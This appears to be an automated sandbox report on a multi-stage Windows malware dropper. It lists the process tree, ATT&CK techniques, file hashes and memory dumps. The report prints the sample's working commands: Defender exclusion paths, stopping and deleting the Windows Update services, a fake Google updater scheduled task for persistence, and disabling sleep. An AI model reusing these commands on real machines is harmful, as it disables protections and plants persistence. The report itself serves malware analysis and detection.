C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2700

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:4196

C:\Users\Admin\AppData\Local\Temp\setup32.exe
"C:\Users\Admin\AppData\Local\Temp\setup32.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:79684

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:5108

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:5012

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:376

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:3244

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:940

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:240

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:276

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:2244

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:3780

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:1848

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2628

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\setup3221.exe
"C:\Users\Admin\AppData\Local\Temp\setup3221.exe"
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
4⤵
- Blocklisted process makes network request
PID:4100

C:\Windows\Temp\222.exe
"C:\Windows\Temp\222.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5000

C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
"C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4176

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:93164

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:4708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6060

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6748

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6848

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:6896

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6924

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:7004

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:7052

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:7140

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:7160

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:7180

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:7196

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:7216

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:6760

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:6936

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:7016

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:7040

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:7100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6796

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe ekwaxvtzumfvch
2⤵
PID:8392

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:8432

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:8404

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:8592

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe cxfacjpoynzyzzmc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1g/oS7Mgp0E17ll9y0I6gqFt/X0Sayxrm+G3lICBwYbS
2⤵
PID:8700

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8220

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
2f72537f636dc6eee43878bc859a4ec0

SHA1
5dcd85434721902b906d4e06907873844760d348

SHA256
39702baf633ce7008b7be66ed67aec862ac6d2b6a4ed975cafaa9e5e6aba2a89

SHA512
675553a3e6f33a2f2e98488ced3e01be15a65ea9b46c4976be590b2683b99162684318d926e5f605d51febbf460f845345968b14786b8b6d199a539439007f43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
f23b2644c03eee3004dde826675423c6

SHA1
976dea0531a6aa7e23f4d39385f6ecaaec42e8d9

SHA256
b033679cbd57cd6b31d0c6953cbb989431d750b7ab86bfdf00b85f8fadff2e1d

SHA512
b63c531000413c35f9d16766e3f5e1ab440d7b213d4be0aadbe36097ec32a18d127c45e7981bac9406c57271cd32991d1e73c2bfdc0ba6dd6e4e35266cba5e86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
922572db59aa99f80552227089007bb6

SHA1
38dbf77c729e373d555ca8220534743a1c436897

SHA256
ed868ed786a452a21819227678e7b97831c27535c82a186c82dcd47523f602bc

SHA512
0f8095bb1d58732f94213ccf758dcdfb4c3edcdb8862d6be2edf5aad18aadcfeec09ae2c8b99418205cf13722ae22581e09570a78af9825766a3563dfb3aac3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
09ffd3761d532aa3353e450aec55565d

SHA1
88737849260ca8f58da299d56dd00b17b14ca8b6

SHA256
9816894ce2d24ffa81debab3261637f4435edf8df1a835628d28fdf33d7a75ab

SHA512
d5a4c004342fa00af606abda5e108b4219cbca29004d78e35557179d17c79c05d605e417c6af5800d3bdf99e3862645ecc1e0b28043f704369f63a0534113bff

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
425KB

MD5
7d5590f0f67171470aa09d8a75a02b02

SHA1
6fad57ac11b49e096aac2839880266358e1a12e9

SHA256
d619aeb13fe304255179674c2a593eebf59d485d37bb3121105201536191e706

SHA512
77de0277369e0e2ccdde874ec3b03a501bf0fa3a417e0409a76aa1a96e62c98425f64f4e2d12c95ca21741959769dc64764dd0fc583b0c4fb7ede10a90a2c83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
425KB

MD5
7d5590f0f67171470aa09d8a75a02b02

SHA1
6fad57ac11b49e096aac2839880266358e1a12e9

SHA256
d619aeb13fe304255179674c2a593eebf59d485d37bb3121105201536191e706

SHA512
77de0277369e0e2ccdde874ec3b03a501bf0fa3a417e0409a76aa1a96e62c98425f64f4e2d12c95ca21741959769dc64764dd0fc583b0c4fb7ede10a90a2c83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Windows\Temp\1.vbs
Filesize
105B

MD5
7402b8035ec1c280ca12067fb48f78cf

SHA1
f53efaa35eca6c64b1a54d250cd644d07269c787

SHA256
6479ad76955df79ac09773987823c4ca59f16db33668dae727d97c05178d2726

SHA512
bb7c9bf83e31de09f483221ee24ca12425c95e4e01005d8473666302e42b3633c974407d1053fd970fb325f1d35529c802486444fe5bc6ca72f024ff8d7d7d0b

Download Submit
C:\Windows\Temp\222.exe
Filesize
163KB

MD5
816ecc60aa759bc30c95d8aaeab2751f

SHA1
45facc187bf263c5fcf17454a0a28ece20ec133e

SHA256
426e4a4c31a394a7324f16c5b5469ef982689521a85156eea24feb50f5aeaf10

SHA512
9462563f1df877b091b90817de780a4e2ad1661ea1318ffa618f5b0dc3b7679c61fd306e2b7a6e17a9e230f9801737e28d386069f54ca67cb6a08d081696255d

Download Submit
C:\Windows\Temp\222.exe
Filesize
163KB

MD5
816ecc60aa759bc30c95d8aaeab2751f

SHA1
45facc187bf263c5fcf17454a0a28ece20ec133e

SHA256
426e4a4c31a394a7324f16c5b5469ef982689521a85156eea24feb50f5aeaf10

SHA512
9462563f1df877b091b90817de780a4e2ad1661ea1318ffa618f5b0dc3b7679c61fd306e2b7a6e17a9e230f9801737e28d386069f54ca67cb6a08d081696255d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
f8a64f17990cd96a5169c422e853cc7d

SHA1
2fa6bd677b497f9904c91b63f71a1d240f11e7e3

SHA256
e074717fc02dc04976af054d2c07a6630f7873e6891d7e91bf78ef93ea09b1b9

SHA512
1dd72c290a09caf0b45a6db651e14436db5a857310ec2804e0634251a70a61de6ff05094f67363087285df9820adeea541b45c11874024f752f04d812943980e

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
memory/228-736-0x0000000000000000-mapping.dmp

Download
memory/232-668-0x0000000000000000-mapping.dmp

Download
memory/240-667-0x0000000000000000-mapping.dmp

Download
memory/276-671-0x0000000000000000-mapping.dmp

Download
memory/376-657-0x0000000000000000-mapping.dmp

Download
memory/380-167-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-128-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-156-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-157-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-158-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-159-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-130-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-161-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-162-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-163-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-164-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-165-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-166-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-131-0x00000000013E0000-0x0000000001741000-memory.dmp

Filesize
3.4MB

Download
memory/380-168-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-169-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-170-0x0000000077C80000-0x0000000077E0E000-memory.dmp

Filesize
1.6MB

Download
memory/380-171-0x0000000077C80000-0x0000000077E0E000-memory.dmp

